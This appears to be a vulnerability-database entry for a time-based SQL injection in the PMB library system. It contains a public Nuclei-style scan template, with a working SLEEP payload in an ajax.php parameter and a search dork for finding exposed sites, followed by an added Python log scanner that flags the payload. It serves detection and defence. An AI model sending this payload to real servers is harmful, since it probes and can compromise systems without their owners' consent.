pmb-sqli: PMB <= 7.4.6 - SQL Injection

Date: 2025-08-01 | Affected software: PMB | PoC: public

Vulnerability description

PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.

PoC code [public]

id: pmb-sqli

info:
  name: PMB <= 7.4.6 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs.
  reference:
    - https://www.exploit-db.com/exploits/51197
    - https://vulners.com/exploitdb/EDB-ID:51197
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"opac_css"
  tags: time-based-sqli,sqli,unauth,pmb,vuln

http:
  - raw:
      - |
        @timeout: 15s
        GET /pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(7)))SHde)&module=ajax&sub=save&token=undefined HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains(header, "PmbOpac")'
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100841a904da753cdc0faf99fd2f8dd73995887b3f130e03c5510ef08637e6dc7e8022100b1172df530ad52391c0c3492b7914948b255f90d1d2121338ad5026943f0f95a:922c64590222798bb761d5b6d8e72950
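
A defender-side counterpart to the template above, as an added example that is not part of the original page or the template author's code: it scans web access logs for requests to the same `opac_css/ajax.php` endpoint (`categ=storage`, `sub=save`) whose `id` value is not a plain integer. The log lines are constructed samples in combined log format, the function name is hypothetical, and treating a legitimate `id` as purely numeric is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "GET /pmb/opac_css/ajax.php'
    '?categ=storage&datetime=undefined&id=12&module=ajax&sub=save&token=undefined'
    ' HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Aug/2025:10:00:05 +0000] "GET /pmb/opac_css/ajax.php'
    '?categ=storage&datetime=undefined'
    '&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(7)))SHde)'
    '&module=ajax&sub=save&token=undefined HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Aug/2025:10:00:09 +0000] "GET /pmb/opac_css/index.php'
    '?lvl=index HTTP/1.1" 200 20480',
]

# Client address, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_storage_requests(lines):
    """Return (client, decoded id) for storage/save hits with a non-integer id."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable GET/POST request line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/opac_css/ajax.php"):
            continue
        # parse_qs percent-decodes values, so encoded payloads are compared
        # in their decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("categ") != ["storage"] or params.get("sub") != ["save"]:
            continue
        for value in params.get("id", []):
            # Assumption: a legitimate id is a plain ASCII integer.
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_storage_requests(SAMPLE_LOG):
        print(f"{client}: non-numeric id on ajax.php storage/save: {value!r}")
```

Only GET and POST request lines with the parameters in the query string are inspected; a parameter sent in a POST body does not appear in a standard access log.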
